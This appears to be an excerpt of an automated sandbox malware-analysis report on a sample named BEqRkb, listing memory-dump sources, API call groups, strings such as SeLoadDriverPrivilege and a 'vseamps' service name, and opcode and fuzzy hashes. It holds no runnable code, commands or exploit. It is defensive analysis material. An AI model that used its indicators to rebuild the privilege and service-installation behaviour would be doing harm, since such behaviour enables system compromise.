                                                                                        • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                                                        • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                        • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                        • String ID:
                                                                                        • API String ID: 190073905-0
                                                                                        • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                        • Instruction ID: c21254168a6c38ba4aeb7cc295dc4afa669e855f3f2cc82f7fd314385894a44c
                                                                                        • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                        • Instruction Fuzzy Hash: 83817C61F0CF4385FA54ABA794412B92692BF57FE0F5445FBE90C476B2DE3CE8468600

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                                                        • String ID: WordpadFilter.db
                                                                                        • API String ID: 868324331-3647581008
                                                                                        • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                        • Instruction ID: 262a7618dd604510a41771ef6bd69b5565cfe51350de7ece001007f1a8e80642
                                                                                        • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                        • Instruction Fuzzy Hash: E6317C32B19F41C9E700CBA2D8406BD73A6FB89B98F1445BAEE4D13B54EE38D591C340

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 73155330-0
                                                                                        • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                        • Instruction ID: 20d6554e5a77a0e93d02f1eb56233782f8c58d09a44b0c09e4f8f4e9a80f9ef3
                                                                                        • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                                        • Instruction Fuzzy Hash: A3813A22B1DB8245E6118B3698401B9B695FF57FE4F1483BBEE59577A2EF3CE0918300
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3526400053-0
                                                                                        • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                        • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                                                        • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                                        • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                                                        • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                                                        • API String ID: 3408796845-4213300970
                                                                                        • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                        • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                                                        • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                                        • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                                                        • String ID: ampStopSingletone: logging ended
                                                                                        • API String ID: 2048888615-3533855269
                                                                                        • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                        • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                                                        • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                                        • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                        • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                                                        • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                                        • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastManagerOpen$FileModuleName
                                                                                        • String ID: /remove$/service$vseamps
                                                                                        • API String ID: 67513587-3839141145
                                                                                        • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                        • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                                                        • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                                        • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                                                        • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                                                        • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                                                          • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Load$Library
                                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                        • API String ID: 3981747205-232180764
                                                                                        • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                        • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                                                        • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                                        • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                                                        • String ID:
                                                                                        • API String ID: 4284112124-0
                                                                                        • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                        • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                                                        • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                                        • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                                                        • String ID: vseamps
                                                                                        • API String ID: 3693165506-3944098904
                                                                                        • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                        • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                                                        • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                                        • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName
                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                        • API String ID: 514040917-4022980321
                                                                                        • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                        • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                                                        • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                                        • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 2057259594-0
                                                                                        • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                        • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                                                        • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                                        • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3103264659-0
                                                                                        • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                        • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                                                        • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                        • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3140674995-0
                                                                                        • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                        • Instruction ID: 0df473ea65eac9d8e5cebb56309f06a445dff3540951c508f90c8b71de79c105
                                                                                        • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                        • Instruction Fuzzy Hash: FB310976709A8186EB608FA1E8407FE7366FB85B94F44407BDA4E47AA4EF38D548C710
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1269745586-0
                                                                                        • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                        • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                                                        • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                        • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1239891234-0
                                                                                        • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                        • Instruction ID: 7f00baacd57c16f140912a2b6c9d89bdfa8e4cc5571eb5e97a600a5602932cdc
                                                                                        • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                        • Instruction Fuzzy Hash: A3317336708F8195D760CB65E8406BE33A1FB85BA4F5001B7EA8D43B65EF38C145CB00
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                        • String ID:
                                                                                        • API String ID: 1445889803-0
                                                                                        • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                        • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                                                        • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                        • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                                                        • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1617791916-0
                                                                                        • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                        • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                                                        • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                        • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
